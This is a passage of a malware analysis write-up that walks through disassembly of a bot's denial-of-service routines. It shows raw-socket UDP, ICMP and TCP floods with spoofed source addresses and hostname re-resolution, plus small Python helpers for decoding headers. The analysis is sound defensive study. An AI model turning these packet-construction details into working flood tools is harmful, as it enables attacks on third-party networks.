[It turns out theres over 11,000 of them - See Appendix A] With analysing the network traffic (will be done in Network_Analysis_C), one can already see that packets are sent off to DNS servers on a dns port. The source IP and source port are both able to be set by the blackhat through his/her own communications channel. The actual attack is undoubtedly a form of amplification attack. Some easily seen 'features' of this attack: * Can attack a single victim * Attack can be done via hostname - on the attacking machine * DNS lookups are done occasionally and the IP address updated * The attack is scalable on a packets-per-second basis * Attack has no timeout * 9 different dns requests are used e) Network_Function_C [0x80499f4] - (Network) Known Usage: function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp), *0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp), *0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp), *0xfffff00b(%ebp), *0xfffff00c(%ebp), 0xffffbb44(%ebp)) Guesses at purpose: Possibly another sort of packetting function like Network_Function_B. Naming Conventions: Parameters will be given the following names: function(LongA, LongB, LongC, LongD, LongE, LongF, LongG, LongH, LongI, LongJ, LongK, BufferA) Disassembly: The function starts with a much smaller local stack size than the previous function: 0x80499f7: subl $0xa0,%esp This is followed by copying of the parameters to localised variables, and: 0x8049a3c: movw $0x2,0xfffffff0(%ebp) 0x8049a42: call 0x8055e38 First is a simple assignment, next is a call to what was earlier believed to be random(). 0x8049a47: movl $0xff,%ecx 0x8049a4c: cltd 0x8049a4d: idivl %ecx,%eax 0x8049a4f: movl %edx,%eax 0x8049a51: xchgb %al,%ah 0x8049a53: movw %ax,0xfffffff2(%ebp) The result goes through the now familiar MOD'ing process, is xchg()'d in what is probably a way of htons()'ing the number, and is finally stored at 0xfffffff2(%ebp). This is two bytes after the previous 2 was moved into at 0x8049a3c. 
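A 2 followed two bytes later by a byte-swapped 16-bit value looks like the start of a struct sockaddr_in (family, then port). That reading is an assumption at this point in the analysis, but it can be illustrated with a short Python sketch; the helper name, the port 200 and the address 192.0.2.1 are example values only.

```python
import socket
import struct

AF_INET = 2  # value stored by movw $0x2,0xfffffff0(%ebp)

def pack_sockaddr_in(port, ip):
    """Lay out a 16-byte sockaddr_in as it would sit in i386 memory."""
    family = AF_INET.to_bytes(2, "little")  # host byte order
    port_be = struct.pack("!H", port)       # network byte order
    return family + port_be + socket.inet_aton(ip) + bytes(8)

addr = pack_sockaddr_in(200, "192.0.2.1")  # example values only
print(len(addr), addr.hex())
```

If the assumption holds, the family sits at offset 0, the port at offset 2 and the address at offset 4, for a total of 0x10 bytes.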
We then setup for a function call: 0x8049a57: movzbl %bl,%eax 0x8049a5a: pushl %eax 0x8049a5b: movzbl 0xffffff6c(%ebp),%eax 0x8049a62: pushl %eax 0x8049a63: movzbl 0xffffff70(%ebp),%eax 0x8049a6a: pushl %eax 0x8049a6b: movzbl 0xffffff74(%ebp),%eax 0x8049a72: pushl %eax 0x8049a73: pushl $0x806768a 0x8049a78: leal 0xffffff90(%ebp),%esi 0x8049a7b: pushl %esi 0x8049a7c: call 0x804f808 (gdb) x/1s 0x806768a 0x806768a: "%d.%d.%d.%d" This function has been identified as sprintf(), so the call looks like: sprintf(0xffffff90(%ebp), "%d.%d.%d.%d", *0xffffff74(%ebp), *0xffffff70(%ebp), *0xffffff6c(%ebp), *bl) When looking back at %bl, we soon see that all these addresses are actually the local copies of the parameters, so: sprintf(0xffffff90(%ebp), "%d.%d.%d.%d", LongG, LongH, LongI, LongJ) One can immediately assume LongG-J are IP octets. Conditional: 0x8049a84: cmpl $0x0,0x30(%ebp) 0x8049a88: jne 0x8049abe 0x30(%ebp) corresponds to LongK. If LongK is 0: We setup for another call: 0x8049a8a: movzbl 0xffffff78(%ebp),%eax 0x8049a91: pushl %eax 0x8049a92: movzbl 0xffffff7c(%ebp),%eax 0x8049a99: pushl %eax 0x8049a9a: movzbl 0xffffff80(%ebp),%eax 0x8049a9e: pushl %eax 0x8049a9f: movzbl 0xffffff84(%ebp),%eax 0x8049aa3: pushl %eax 0x8049aa4: pushl $0x806768a 0x8049aa9: leal 0xffffffb0(%ebp),%ebx 0x8049aac: pushl %ebx 0x8049aad: call 0x804f808 Once again, another sprintf, similar to the first: sprintf(0xffffffb0(%ebp), "%d.%d.%d.%d", LongC, LongD, LongE, LongF) One can now assume LongC-F are also IP octets. %ebx is then pushed back onto the stack: 0x8049ab2: pushl %ebx 0x8049ab3: call 0x804ce8c 0x804ce8c is unidentified, so we analyse it and see: 0x804ce9a: call 0x804ceb4 This is the only real action in that part, however this call is also unidentified. Looking into this code, it appears to use the parameter as a pointer, and is comprised of a main loop. This main loop appears to scan through looking for 0x2e('.'). 
There are many checks done on the buffer, including for 0x30,0x78, aka "0x". This instantly makes one look at the source code for inet_aton(), which seems to match the disassembly closely (not precisely - at least not the version I looked at). This only explains the code at 0x804ceb4. The code at 0x804ce8c can be easily explained by looking at the code of inet_addr(). It matches precisely (to the source code I reviewed). As such the code at 0x804ce8c will now be known as inet_addr, and the code at 0x804ceb4 as inet_aton. Upon function completion the return value is stored:

    0x8049ab8: movl %eax,0xfffffff4(%ebp)

Regardless of LongK's earlier value, another function call is then set up and launched:

    0x8049abe: pushl $0xff
    0x8049ac3: pushl $0x3
    0x8049ac5: pushl $0x2
    0x8049ac7: call 0x8056cf4

This one is a lot easier, and has already been identified as socket(). This corresponds to:

    socket(AF_INET, SOCK_RAW, IPPROTO_RAW)

The socket descriptor is placed on the stack:

    0x8049acc: movl %eax,0xffffff68(%ebp)
    0x8049ad5: testl %eax,%eax
    0x8049ad7: jle 0x8049d24

The code will continue if the socket() call was successful:

    0x8049add: movb $0x45,0xffffffd0(%ebp)
    0x8049ae1: movw $0x1c28,0xffffffd2(%ebp)
    0x8049ae7: movw $0x5504,0xffffffd4(%ebp)
    0x8049aed: call 0x8055e38
    0x8049af2: movl $0x82,%ecx
    0x8049af7: cltd
    0x8049af8: idivl %ecx,%eax
    0x8049afa: addb $0x78,%dl
    0x8049afd: movb %dl,0xffffffd8(%ebp)

Once again, the very noticeable value (to all packet watchers) of 0x45 is seen, which immediately raises the suspicion that another packet buffer is being constructed (like in Network_Function_B). Assuming this to be the case, 0xffffffd0(%ebp) would be the start of the IP header. In keeping with this idea, the 0x1c28 would be placed into the IP header total length field. The constant is already in htons()'d form, so read in network byte order it is 0x281c, a total length of 10268 bytes. The next value is 0x5504 and is placed into the IP ID field. Read the same way (0x0455), this corresponds to an ID of 1109.
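The conversions from the movw immediates to the on-the-wire values can be verified with a few lines of Python. This sketch only checks the arithmetic; wire_value is a hypothetical helper name.

```python
def wire_value(movw_immediate):
    """Value read in network byte order after a 16-bit immediate has been
    stored by a little-endian movw."""
    stored = movw_immediate.to_bytes(2, "little")
    return int.from_bytes(stored, "big")

for immediate in (0x1C28, 0x5504):
    print(hex(immediate), "->", wire_value(immediate))
```

Both figures quoted in the text (10268 and 1109) fall out of this byte swap.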
The call is to random() in the famous MOD'ing routine, this time ending in a MOD 130. An additional 0x78 (120) is also added. This number is stored in the IP TTL field. This basically means a random TTL between 120 and 249 will be used.

    0x8049b00: pushl %esi
    0x8049b01: call 0x804ce8c
    0x8049b06: movl %eax,0xffffffdc(%ebp)
    0x8049b09: addl $0x4,%esp
    0x8049b0c: cmpl $0x0,0x30(%ebp)
    0x8049b10: jne 0x8049b21

The first call is to inet_addr, and %esi is still assigned from the first sprintf() earlier. The result is placed into 0xffffffdc(%ebp), which corresponds to the source IP address. 0x30(%ebp) is matched to LongK. If it is 0:

    0x8049b12: leal 0xffffffb0(%ebp),%eax
    0x8049b15: pushl %eax
    0x8049b16: call 0x804ce8c
    0x8049b1b: movl %eax,0xffffffe0(%ebp)

Once again, an inet_addr() call, using 0xffffffb0(%ebp). This address matches up with the destination buffer of the second sprintf() call earlier. The return value is placed into what would correspond to the destination IP address. Back to non-conditional code:

    0x8049b21: movw $0xfe1f,0xffffffd6(%ebp)
    0x8049b27: movw $0x0,0xffffffda(%ebp)
    0x8049b2d: cmpl $0x0,0x8(%ebp)
    0x8049b31: je 0x8049bb0

The 0xfe1f (0x1ffe, or 8190, in network byte order) will be placed into the IP offset position. LongA is then checked. If it is non-zero:

    0x8049b33: movb $0x11,0xffffffd9(%ebp)

The value of 17 is placed into the IP protocol field of the packet buffer, which makes it a UDP packet.

    0x8049b48: movw %ax,0xffffffe4(%ebp)

A random number is generated, MOD 255'd, and xchg'd. The result is placed into 0xffffffe4(%ebp), which would correspond to the beginning of the UDP header, the source port.

    0x8049b4c: movw 0xc(%ebp),%ax
    0x8049b50: xchgb %al,%ah
    0x8049b52: movw %ax,0xffffffe6(%ebp)
    0x8049b56: movw $0x900,0xffffffe8(%ebp)

0xc(%ebp) is LongB, and is xchg'd then placed into 0xffffffe6(%ebp). This corresponds to the UDP destination port. 0x900 is put into 0xffffffe8(%ebp), the UDP length field (9 bytes).
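The 16-bit field at offset 6 of the IP header carries three flag bits followed by a 13-bit fragment offset counted in 8-byte units. The Python sketch below decodes the 0xfe1f immediate on that basis; it is an illustration of the field layout rather than anything taken from the binary, and the function name is hypothetical.

```python
def decode_frag_field(movw_immediate):
    """Return (flags, offset in 8-byte units, offset in bytes) for a
    16-bit immediate stored by a little-endian movw."""
    wire = int.from_bytes(movw_immediate.to_bytes(2, "little"), "big")
    flags = wire >> 13
    offset_units = wire & 0x1FFF
    return flags, offset_units, offset_units * 8

print(decode_frag_field(0xFE1F))
```

So the packet claims to be a fragment sitting 65520 bytes into its datagram, with no flags set, which is worth keeping in mind for the later network analysis.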
This is followed by a whole set of mathematical code, one which when compared to the checksum code in Network_Function_B, matches. The part of importance: 0x8049ba4: movw %ax,0xffffffea(%ebp) This is where the result is placed into 0xffffffea(%ebp) which is the UDP checksum. Once again, the checksum code has not been analysed to be correct, and it may return a wrong result! 0x8049ba8: movb $0x61,0xffffffec(%ebp) 0x8049bac: jmp 0x8049c10 Finally, a value of 0x61 is placed into 0xffffffec(%ebp) which would mark the start of the UDP data. If the earlier check of LongA shows it to be 0: 0x8049bb0: movb $0x1,0xffffffd9(%ebp) 0x8049bb4: movb $0x8,0xffffffe4(%ebp) 0x8049bb8: movb $0x0,0xffffffe5(%ebp) 0x8049bbc: movw $0x0,0xffffffe6(%ebp) The IP protocol is set to 1 (ICMP). ICMP header is assumed to follow after a 20 byte IP header, in which case the ICMP type is set to 8 (ICMP_ECHO), the code is set to 0 (not used for ICMP echo), and the checksum is set to 0. This is followed by the now recognisable checksumming code ending in: 0x8049c0c: movw %ax,0xffffffe6(%ebp) Which replaces the checksum with the determined value. Ending the LongA conditionals: 0x8049c10: movl $0x1d,0xffffff64(%ebp) Some variable is set to 29. What follows is yet more checksum code, ending in: 0x8049c64: movw %ax,0xffffffda(%ebp) 0xffffffda(%ebp) corresponds to the IP checksum field. 0x8049c6a: leal 0xfffffff0(%ebp),%ecx 0x8049c6d: movl %ecx,0xffffff60(%ebp) 0xfffffff0(%ebp) was earlier set to 2 at 0x8049a3c. 0x8049c73: leal 0xffffffd0(%ebp),%edi %edi is loaded with 0xffffffd0(%ebp) which is the start of the 'packet buffer'. Comparisons are done: 0x8049c7a: cmpl $0x0,0x30(%ebp) 0x8049c7e: je 0x8049cce 0x8049c80: testl %ebx,%ebx 0x8049c82: jg 0x8049cce 0x30(%ebp) is referenced to LongK, and %ebx was set to 0 earlier (initially). 
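For comparison with the checksum code seen in these functions, the standard Internet checksum (the one's complement sum used by IP, UDP and ICMP) can be written in a few lines of Python. This is the textbook algorithm, not a transcription of the disassembly, and as noted the binary's own routine has not been verified against it.

```python
def internet_checksum(data):
    """One's complement of the one's complement sum of 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"  # pad odd-length input with a zero byte
    total = 0
    for i in range(0, len(data), 2):
        total += int.from_bytes(data[i:i + 2], "big")
    while total > 0xFFFF:  # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

# ICMP echo header as built above: type 8, code 0, checksum 0, rest zero
# (the zero id/sequence bytes are an assumption for the example).
icmp = bytes([8, 0, 0, 0, 0, 0, 0, 0])
print(hex(internet_checksum(icmp)))
```

A quick way to test a captured packet is to run the same function over the header with its checksum in place: a correct checksum makes the result 0.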
Both jumps skip the lookup: the first when LongK is 0, the second when %ebx is greater than 0. So if LongK is non-zero and %ebx has counted down to 0, we continue:

    0x8049c84: movl 0x34(%ebp),%ecx
    0x8049c87: pushl %ecx
    0x8049c88: call 0x804bf80

0x34(%ebp) is referenced to BufferA, and 0x804bf80 is believed to be gethostbyname() code. Fairly self-explanatory.

    0x8049c8d: movl %eax,%edx
    0x8049c92: testl %edx,%edx
    0x8049c94: jne 0x8049cac

The result is checked (for failure of gethostbyname). If it failed:

    0x8049c96: pushl $0x258
    0x8049c9b: call 0x80556cc
    0x8049ca0: movl $0x1,%esi
    0x8049ca8: jmp 0x8049cce

First is a call to sleep(0x258). %esi is believed to be used as a variable at the moment, and is set to 1. A jump is in place, indicating the earlier gethostbyname() check was an if-then-else. If the function succeeded (in resolving the hostname in BufferA):

    0x8049cac: pushl $0x4
    0x8049cae: leal 0xffffff88(%ebp),%eax
    0x8049cb1: pushl %eax
    0x8049cb2: movl 0x10(%edx),%eax
    0x8049cb5: movl (%eax),%eax
    0x8049cb7: pushl %eax
    0x8049cb8: call 0x8056480

Once again, we see the Misc_Data_Copy() function used in the same way as before. %edx is the returned pointer to a hostent structure, and 0x10(%edx) leads to the first resolved IP address of the hostname. Effectively the 4 bytes of this IP address are copied into 0xffffff88(%ebp). Continuing:

    0x8049cbd: movl 0xffffff88(%ebp),%eax
    0x8049cc0: movl %eax,0xffffffe0(%ebp)
    0x8049cc3: movl %eax,0xfffffff4(%ebp)
    0x8049cc6: movl $0x9c40,%ebx
    0x8049cce: testl %esi,%esi
    0x8049cd0: jne 0x8049d1d

0xffffff88(%ebp) is now copied into 0xffffffe0(%ebp), which is the destination IP address in the packet buffer. 0xfffffff4(%ebp) is unknown. %ebx was used earlier to determine if gethostbyname() should even be called, and is now reset to 0x9c40 (40000). It is used identically to its counterpart in Network_Function_B, as a way of having gethostbyname() called again every X seconds (/minutes/hours). %esi is used to keep track of gethostbyname failures. If gethostbyname isn't even called, it should be 0.
If it is called and is successful, it should be 0, but if it was called and failed, it was set to 1 (see 0x8049ca0). As such, if either it was not called, or it was called and succeeded:

    0x8049cd2: pushl $0x10
    0x8049cd4: movl 0xffffff60(%ebp),%ecx
    0x8049cda: pushl %ecx
    0x8049cdb: pushl $0x0
    0x8049cdd: movl 0xffffff64(%ebp),%ecx
    0x8049ce3: pushl %ecx
    0x8049ce4: pushl %edi
    0x8049ce5: movl 0xffffff68(%ebp),%ecx
    0x8049ceb: pushl %ecx
    0x8049cec: call 0x8056c3c

A quick look to see what %edi was:

    0x8049c73: leal 0xffffffd0(%ebp),%edi

And the sendto() call looks like this:

    sendto(*0xffffff68(%ebp), 0xffffffd0(%ebp), *0xffffff64(%ebp), 0, *0xffffff60(%ebp), 0x10)

Looking at what each of these are, *0xffffff68(%ebp) should still be the socket descriptor set at 0x8049acc. 0xffffffd0(%ebp) is the now well known packet buffer for this function. *0xffffff64(%ebp) was earlier set to 0x1d and is believed not to change. *0xffffff60(%ebp) points to a sockaddr structure (at 0xfffffff0(%ebp)), which when looking back has been set up with values for family=AF_INET, port=random, and address=destination ip. The sendto call is then set up and repeated again. After this:

    0x8049d13: pushl $0x14
    0x8049d15: call 0x80555b0

Believed to be a usleep(20). This is followed by:

    0x8049d1d: decl %ebx
    0x8049d1e: jmp 0x8049c78

Just a reminder that %ebx acts as a count-down. When it reaches 0, the process will gethostbyname() the string in BufferA and reset %ebx to 40000. The process then jumps back up to 0x8049c78, in what looks to be a loop of simply checking the hostname, updating the IP (if it is time), and continuing to send packets!

Disassembly Review: Network_Function_C is a lot simpler than Network_Function_B. It appears to simply use the parameters to generate a packet buffer, and forms a loop to continuously send packets. A solitary usleep(20) for every 2 packets sent should rate limit the output to a constant. LongA seems to be used to select an ICMP or UDP packet (0 = ICMP, anything else = UDP).
LongB is used to set the packet destination port (UDP only). LongC-F are used as the destination IP octets, and LongG-J are used as the source octets. LongK is used to identify whether the process should use the LongC-F octets, or if it should use an expected hostname in BufferA. Function Overview: A strange function, with strange packet production - analysis of which will be left for Network_Analysis_D. The outcome of this function will be a flood of 29 byte udp or icmp packets. Very small, however the packet header contains an IP offset of 8190, along with an IP size field of 10268 bytes. It's possible the author made 'several' mistakes when coding this function, but given the good-coding of Network_Function_B, it may all be intentional. The outcome of these packets is unknown, but will certainly be examined in Network_Analysis_D. Features of this attack: * Single victim * Victim may be hostname-based * Hostname can be re-looked up every 80000 packets(2.2MB)! * Packet stream should be constant(except during dns lookups) * Content can be UDP or ICMP * Packets should be errors. f) Network_Function_D [0x8049d40] - (Network) Known Usage: function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp), *0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp), *0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp), *0xfffff00b(%ebp), *0xfffff00c(%ebp), *0xfffff00d(%ebp), *0xfffff00e(%ebp), 0xffffbb44(%ebp)) Guesses at purpose: Possibly another packetting function like network functions B and C Naming Conventions: Parameters will be given the following names: function(LongA, LongB, LongC, LongD, LongE, LongF, LongG, LongH, LongI, LongJ, LongK, LongL, LongM, BufferA) Disassembly: This function starts off just like the previous, with copying of function parameters into local variables. One of the first things of interest to occur: 0x8049d94: cmpl $0x0,0x34(%ebp) 0x8049d98: je 0x8049d9d 0x8049d9a: decl 0x34(%ebp) 0x34(%ebp) is LongL. If it is non-zero, it is decremented. 
This is followed by:

    0x8049d9d: pushl $0x0
    0x8049d9f: call 0x8057444

Which matches a time(0) call, the result of which:

    0x8049da7: pushl %eax
    0x8049da8: call 0x80559a0

is passed to an srandom() call.

    0x8049db0: movw $0x2,0xfffffff0(%ebp)
    0x8049db6: call 0x8055e38

2 is put into a variable, and is followed by a call to random(). The result goes through the now expected MOD routine, this time by 255, and the outcome is xchg()'d then placed into 0xfffffff2(%ebp).

    0x8049dcb: cmpl $0x0,0x38(%ebp)
    0x8049dcf: jne 0x8049e0b

0x38(%ebp) matches up with LongM. If LongM is 0:

    0x8049dd1: movzbl 0xffffff38(%ebp),%eax
    0x8049dd8: pushl %eax
    0x8049dd9: movzbl 0xffffff54(%ebp),%eax
    0x8049de0: pushl %eax
    0x8049de1: movzbl 0xffffff58(%ebp),%eax
    0x8049de8: pushl %eax
    0x8049de9: movzbl 0xffffff5c(%ebp),%eax
    0x8049df0: pushl %eax
    0x8049df1: pushl $0x806768a
    0x8049df6: leal 0xffffff88(%ebp),%ebx
    0x8049df9: pushl %ebx
    0x8049dfa: call 0x804f808

This is an sprintf call, and one that has been seen before. The pushl's all correspond to the localised versions of the function parameters. It effectively attempts to form a dotted quad address at 0xffffff88(%ebp) using LongA, LongB, LongC, and LongD as the octets. With this:

    0x8049dff: pushl %ebx
    0x8049e00: call 0x804ce8c
    0x8049e05: movl %eax,0xfffffff4(%ebp)

inet_addr() is called and the result placed into 0xfffffff4(%ebp).

    0x8049e0b: movb $0x45,0xffffffc8(%ebp)
    0x8049e0f: movw $0x2800,0xffffffca(%ebp)
    0x8049e15: movb $0x0,0xffffffc9(%ebp)

Once again, the well-known 0x45. Assuming this corresponds to the ihl and version of an IP header, the packet buffer would start at 0xffffffc8(%ebp). As such, 0xffffffca(%ebp) should be the length field of the IP header (in network byte order, so 0x2800 reads as 0x0028, or 40 bytes). 0xffffffc9(%ebp) would be the TOS field.
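The first four bytes of this suspected IP header can be rebuilt and parsed to see what a receiver would make of them. The Python below is a small sketch under the assumption that the buffer really is an IP header starting at 0xffffffc8(%ebp); the 20-byte header sizes are the standard minimum IP and TCP header lengths.

```python
import struct

IP_HEADER_LEN = 20
TCP_HEADER_LEN = 20  # minimum TCP header, no options

# 0x45 at offset 0, 0x00 at offset 1, then the movw $0x2800 at offset 2
# as it would be laid out by a little-endian store.
first_four = bytes([0x45, 0x00]) + (0x2800).to_bytes(2, "little")

version_ihl, tos, total_length = struct.unpack("!BBH", first_four)
payload = total_length - IP_HEADER_LEN - TCP_HEADER_LEN
print(hex(version_ihl), tos, total_length, payload)
```

A total length of 40 leaves room for exactly one option-less transport header of 20 bytes and no data, which is a useful hint about what follows.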
A function is set up and called:

    0x8049e19: pushl $0xff
    0x8049e1e: pushl $0x3
    0x8049e20: pushl $0x2
    0x8049e22: call 0x8056cf4

A simple socket() call, no different to what was seen in earlier functions:

    socket(AF_INET, SOCK_RAW, IPPROTO_RAW)

The socket descriptor is placed into a variable:

    0x8049e27: movl %eax,0xffffff40(%ebp)
    0x8049e30: testl %eax,%eax
    0x8049e32: jle 0x804a178

And is then checked to ensure it is greater than 0. If so:

    0x8049e38: cmpl $0x0,0x20(%ebp)
    0x8049e3c: je 0x8049e72

0x20(%ebp) is checked. This corresponds to LongG. If it is non-zero:

    0x8049e3e: movzbl 0xffffff44(%ebp),%eax
    0x8049e45: pushl %eax
    0x8049e46: movzbl 0xffffff48(%ebp),%eax
    0x8049e4d: pushl %eax
    0x8049e4e: movzbl 0xffffff4c(%ebp),%eax
    0x8049e55: pushl %eax
    0x8049e56: movzbl 0xffffff50(%ebp),%eax
    0x8049e5d: pushl %eax
    0x8049e5e: pushl $0x806768a
    0x8049e63: leal 0xffffff68(%ebp),%eax
    0x8049e69: pushl %eax
    0x8049e6a: call 0x804f808

An sprintf is set up and called, once again to form a dotted quad using parameters passed to the function (LongH,LongI,LongJ,LongK).

    0x8049e72: cmpl $0x0,0x38(%ebp)
    0x8049e76: jne 0x8049e87

LongM is checked, and if it is zero (the jne skips this code otherwise):

    0x8049e78: leal 0xffffff88(%ebp),%eax
    0x8049e7b: pushl %eax
    0x8049e7c: call 0x804ce8c
    0x8049e81: movl %eax,0xffffffd8(%ebp)

The buffer at 0xffffff88(%ebp) is passed to inet_addr(). This was set up earlier by an sprintf (the first one) to be a dotted quad of LongA-D. The result of the inet_addr() is placed into 0xffffffd8(%ebp), which should correspond to the destination IP of the packet buffer that appears to be under construction. Some more packet buffer setup:

    0x8049e87: movw $0x0,0xffffffce(%ebp)
    0x8049e8d: movb $0x6,0xffffffd1(%ebp)

The 0 is placed into the IP offset field. The 6 is placed into the IP protocol field, indicating a TCP packet. Assuming a 20 byte IP header as indicated by the ihl, the TCP header should start at 0xffffffdc(%ebp) (0xffffffc8 + 0x14).
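Since the rest of this function pokes at individual TCP header fields by %ebp displacement, it helps to tabulate where each field should land. The Python sketch below assumes the IP header starts at 0xffffffc8(%ebp) and is 20 bytes long, so the TCP header begins 0x14 bytes later at 0xffffffdc(%ebp); the field offsets are those of the standard TCP header and the helper name is hypothetical.

```python
IP_START = 0xFFFFFFC8  # displacement of the IP header from %ebp (from the listing)
IP_HEADER_LEN = 20     # as indicated by the ihl of 5

# Byte offsets of fields within a standard TCP header.
TCP_FIELDS = {
    "source port": 0,
    "destination port": 2,
    "sequence number": 4,
    "acknowledgement number": 8,
    "data offset": 12,
    "flags": 13,
    "window": 14,
    "checksum": 16,
    "urgent pointer": 18,
}

def tcp_field_displacement(name):
    """Displacement from %ebp at which a given TCP header field should sit."""
    return (IP_START + IP_HEADER_LEN + TCP_FIELDS[name]) & 0xFFFFFFFF

for name in TCP_FIELDS:
    print(f"{name:24s} 0x{tcp_field_displacement(name):08x}(%ebp)")
```

These displacements line up with the stores that follow in the function (0xffffffde, 0xffffffe4, 0xffffffe8, 0xffffffe9 and 0xffffffee).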
0x8049e91: movb 0xffffffe9(%ebp),%al 0x8049e94: andb $0xef,%al 0x8049e96: movb %al,0xffffffe9(%ebp) 0x8049e99: movb 0xffffffe8(%ebp),%al 0x8049e9c: andb $0xf,%al 0x8049e9e: orb $0x50,%al 0x8049ea0: movb %al,0xffffffe8(%ebp) These lines appear to do logical operations on byte values starting 0xffffffe9(%ebp) by 0xef. 0xffffffe9(%ebp) should correspond to the beginning of the TCP flags. This seems extremely strange since the values at the two bytes involved in the logical operations above do not seem to be set previously. 0x8049ea3: movl $0x0,0xffffffe4(%ebp) 0x8049eaa: andb $0x50,%al 0x8049eac: movb %al,0xffffffe8(%ebp) This results in the acknowledgement number being set to 0. %al should not be given a guaranteed value at this time so once again, the setting of 0xffffffe8(%ebp) is extremely strange. 0x8049eaf: movb $0x2,0xffffffe9(%ebp) 0xffffffe9(%ebp) earlier took part in the strange activity above, yet is now set to a constant of 2. It seems strange that a C compiler would have done the earlier code, possibly indicating a buggy compiler, or a buggy programmer with buggy asm. 0x8049eb3: movw $0x0,0xffffffee(%ebp) The 0 is placed into what looks to be the urgent data pointer in the tcp header. 0x8049eb9: movl 0x18(%ebp),%eax 0x8049ebc: shll $0x8,%eax 0x8049ebf: addw 0x1c(%ebp),%ax 0x8049ec3: xchgb %al,%ah 0x8049ec5: movw %ax,0xffffffde(%ebp) LongE and LongF seem to work together to form the tcp destination port. 0x8049ecb: movb $0x0,0xffffffb0(%ebp) 0x8049ecf: cmpl $0x0,0x38(%ebp) 0x8049ed3: jne 0x8049edb It is unclear what 0xffffffb0(%ebp) is used for at this point. 0x38(%ebp) once again, still refers to LongM. If it is 0: 0x8049ed5: movl 0xffffffd8(%ebp),%eax 0x8049ed8: movl %eax,0xffffffac(%ebp) 0xffffffd8(%ebp) contains the destination IP that was set in the packet buffer earlier. 
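The and/or sequence on 0xffffffe8(%ebp) and 0xffffffe9(%ebp) can be traced for every possible starting value of the two bytes. This is a sketch under one assumption: %al is not touched by anything other than the instructions listed above (the addresses shown are contiguous, which suggests this is the case). The function name trace is made up for illustration.

```python
def trace(byte_e8, byte_e9):
    """Replay the listed byte operations for given initial memory contents."""
    al = byte_e9 & 0xEF      # andb $0xef,%al   (clears bit 0x10)
    byte_e9 = al             # movb %al,0xffffffe9(%ebp)
    al = byte_e8 & 0x0F      # andb $0xf,%al
    al |= 0x50               # orb  $0x50,%al
    byte_e8 = al             # movb %al,0xffffffe8(%ebp)
    al &= 0x50               # andb $0x50,%al   (movl to 0xffffffe4 leaves %al alone)
    byte_e8 = al             # movb %al,0xffffffe8(%ebp)
    byte_e9 = 0x02           # movb $0x2,0xffffffe9(%ebp)
    return byte_e8, byte_e9

# Try all 65536 combinations of uninitialised stack contents.
results = {trace(a, b) for a in range(256) for b in range(256)}
print(results)
```

Under that assumption only one outcome is possible, 0x50 and 0x02, so the uninitialised bytes never influence the final packet. The pattern resembles what a compiler tends to emit for successive C bitfield assignments, although that remains a guess.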
Continuing:

0x8049edb: movb $0x6,0xffffffb1(%ebp)
0x8049edf: movw $0x1400,0xffffffb2(%ebp)
0x8049ee7: leal 0xffffffa8(%ebp),%ebx
0x8049eea: movl %ebx,0xffffff3c(%ebp)
0x8049ef0: movl $0x0,0xffffff34(%ebp)
0x8049efa: cmpl $0x0,0x38(%ebp)
0x8049efe: je 0x8049f5b

A lot of unknowns, until LongM is checked. The je skips ahead when it is 0, so if LongM is non-zero:

0x8049f00: testl %esi,%esi
0x8049f02: jg 0x8049f5b

%esi is used as a counter in this function (will be seen soon). If this counter has reached 0 (it is initially 0 too):

0x8049f04: movl 0x3c(%ebp),%ebx
0x8049f07: pushl %ebx
0x8049f08: call 0x804bf80
0x8049f0d: movl %eax,%edx
0x8049f12: testl %edx,%edx
0x8049f14: jne 0x8049f30

0x3c(%ebp) is BufferA, and is passed to the gethostbyname() function, as has been seen in previous functions. The return is then checked to ensure it did not fail. If it did fail:

0x8049f16: pushl $0x258
0x8049f1b: call 0x80556cc
0x8049f20: movl $0x1,0xffffff34(%ebp)
0x8049f2d: jmp 0x8049f5b

We sleep(600), set 0xffffff34(%ebp) to 1, and jump. If the gethostbyname is successful, Misc_Data_Copy is called to copy the first IP address for the hostname to 0xffffff64(%ebp). The same address is then copied further:

0x8049f44: movl 0xffffff64(%ebp),%eax
0x8049f4a: movl %eax,0xffffffd8(%ebp)
0x8049f4d: movl %eax,0xfffffff4(%ebp)
0x8049f50: movl %eax,0xffffffac(%ebp)

0xffffffd8(%ebp) is the packet destination address. 0xfffffff4(%ebp) is unknown, and 0xffffffac(%ebp) has just become known. 0xffffffac(%ebp) puts in another piece to solve the puzzle of the data starting at 0xffffffa8(%ebp). A lot of copies were unknown earlier but become clear when it is realised that 0xffffffa8(%ebp) marks the start of a commonly used 'pseudo' header. Earlier, values matching a protocol (6), tcp_length (0x1400, which is 20 in network byte order), and destination address (if hostname wasn't used) were placed in this location.
It is not proven beyond doubt that this memory location is indeed a pseudo header (used for generating the tcp checksum), but it should definitely be looked out for when the checksumming functions occur.

0x8049f53: movl $0x9c40,%esi

%esi is the counter spoken of earlier. This is the point that sets the counter, indicating that a hostname has just been resolved.

0x8049f5b: cmpl $0x0,0xffffff34(%ebp)
0x8049f62: jne 0x8049ef0

0xffffff34(%ebp) appears to be used as an indicator that gethostbyname() failed (if it was called). It was earlier set to 0, and should remain 0 unless gethostbyname was called and failed. As such, if it is 0:

0x8049f64: call 0x8056058

This is a random() call, and is followed by MOD 0xc11 code. Following this:

0x8049f73: addb $0x2,%ah
0x8049f76: xchgb %al,%ah
0x8049f78: movw %ax,0xffffffcc(%ebp)

512 is added to %eax, and the %al and %ah exchanged (htons()'d). The result is placed into 0xffffffcc(%ebp) which should be the IP header ID field. Effectively, this should make this field between 512 and 3600.

The same process is done again, this time with a MOD 0x579, addw 0xc8. The value is inserted into the packet buffer:

0x8049f91: movw %ax,0xffffffea(%ebp)

This matches up with the tcp window, making it between 200 and 1600 (0x579 is 1401, so the remainder is 0 to 1400 before 200 is added).

Yet again, the same process is followed, this time with a MOD 0x9c40, incw %ax. The data is placed:

0x8049fa8: movw %ax,0xffffffdc(%ebp)

0xffffffdc(%ebp) corresponds to the TCP header's source port, making it between 1 and 40000.

